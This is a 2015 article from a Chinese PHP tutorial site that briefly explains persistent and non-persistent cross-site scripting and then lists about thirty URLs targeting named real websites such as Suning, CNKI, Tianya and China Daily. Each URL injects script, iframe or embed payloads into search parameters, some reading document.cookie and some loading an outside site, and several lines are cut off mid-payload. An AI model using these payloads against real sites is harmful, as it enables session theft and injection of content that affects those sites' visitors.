来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 注:以下检测连接均在遨游浏览器测试成功。 对一个网页来讲,XSS就是在未经授权的情况下,向里面插入内容,因为未经授权所以就是漏洞。 但大家更多的关注的不是授权,而是插入内...
注:以下检测连接均在遨游浏览器测试成功。 对一个网页来讲,XSS就是在未经授权的情况下,向里面插入内容,因为未经授权所以 就是漏洞。 但大家更多的关注的不是授权,而是插入内容,这个内容经常带有危害性。 危害更多的是对访问这个页面的其他网民,你插入的代码,在我这儿运行,这些代码实 现很多东西。“在我这儿运行”意味着代码是有环境的,所以XSS必须立足于环境。是哪种情 况下的XSS,这才最关键。 一般将XSS分为持久性和非持久性,两者都有打开某个链接然后自动运行代码(恶意构 造的参数)的特点,持久型就是代码保存在服务端的数据库,像一个网站的用户名,自我介 绍,密码等如果不做过滤就会存在XSS,当我访问你的页面,因为你的名字是一段代码,所 以我承受了这段代码,同时也承受了这段代码可能带来的损失;非持久型就是一个链接,链 接里面有参数,是一段代码,我点了之后浏览器打开这个链接,链接指向的程序执行这段代 码参数,然后返回给我运行结果,执行实质是以向程序提供代码参数做触发,是即时的。
第一个:铭万 B2B
http://search.21ic.com/so.php?keyword=%3Cscript%3Ealert%28document.cookie%29%
http://www.power-cn.cn/sample/search.asp?txtitle=<script>alert(document.cookie)</scr
http://mall.cnki.net/magazine/articlesearch.aspx?keys=%3Ciframe%20src='http://www.chinaxiaoe.com'%3E%3C/iframe%3E
http://www.ccw.com.cn/search/search_article.php?keyword=%3C%2Fspan%3E%3Cifra
http://www.suning.com/emall/Search?searchKeywords=%3Cembed%20SRC=HTTP://WWW.CHINAXIAOE.COM%3E%3C/EMBED%3E
http://www.miiceic.org.cn/plus/search.php?keyword=%3Ciframe+src%3Dhttp%3A%2F
网http://sse1.paipai.com/s-kt11l4oxquvw6sgiqyujn3barq3jjsolru4karusi74j48goi311h338
http://www.codesky.net/article/search/?s=Random_Coder%3C%2Ftitle%3E%3Ciframe+
http://so.mop.com/s?q=%3C/title%3E%3Cembed%20src=Http://www.chinaxiaoe.com%3E%3C/em
http://search.rayli.com.cn/searchII.html?lxkw=%3C/span%3E%3Cembed%20src=http://
http://www.nuomi.com/search?k=%3C%2Ftitle%3E%3Cembed+src%3DHttp%3A%2F%
http://app.zhcw.com/wwwroot/zhcw/jsp/indexSearch.jsp?query=Random_Coder%3C%2
http://ks.pconline.com.cn/index.jsp?q=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%
http://news.panguso.com/newssearch.htm?orderType=1&q=%3C%2Ftitle%3E%3Cembe
http://so.7k7k.com/game/1%22%2F%3E%3Cembed%20src%3Dhttp%3A%5C%2F%2Fwww.chinaxiaoe.com%3E.htm
http://www.19lou.com/search/thread?keyword=%3C%2Ftitle%3E%3Cembed%20src%3
http://search.chinadaily.com.cn/all_en.jsp?searchText=%22%3E%3Cembed+src%3Dhttp
http://www.verycd.com/search/entries/%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3
http://search.tianya.cn/s?q=%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
http://search.newhua.com/search_list.php?searchname=%3C%2Ftitle%3E%3Cembed%
http://mobile.139shop.com/brand/0/0_0_0-0-0-0-0-0_%3C/title%3E%3Cembed%20src=
http://www.appchina.com/market/berry/search.action?q=%3Cembed+src%3Dhttp%3A
http://user.younet.com/search/default.php?search_phone=\%22/%3E%3Cembed%20src
http://search.mbaobao.com/searcher?k=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A
http://www.womai.com/ProductList.htm?Keywords=%3C%2Ftitle%3E%3Cembed%2F*
http://www.cnrmall.com/tv/product/search.jsp?key=%22/%3E%3Cembed%20src=http:/
http://s.manzuo.com/search?keyword=%22%2F%3E%3Cembed%20src%3Dhttp%3A%
http://www.utao365.com/search.php?encode=YTo1OntzOjg6ImNhdGVnb3J5IjtzOjE6IjAi
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com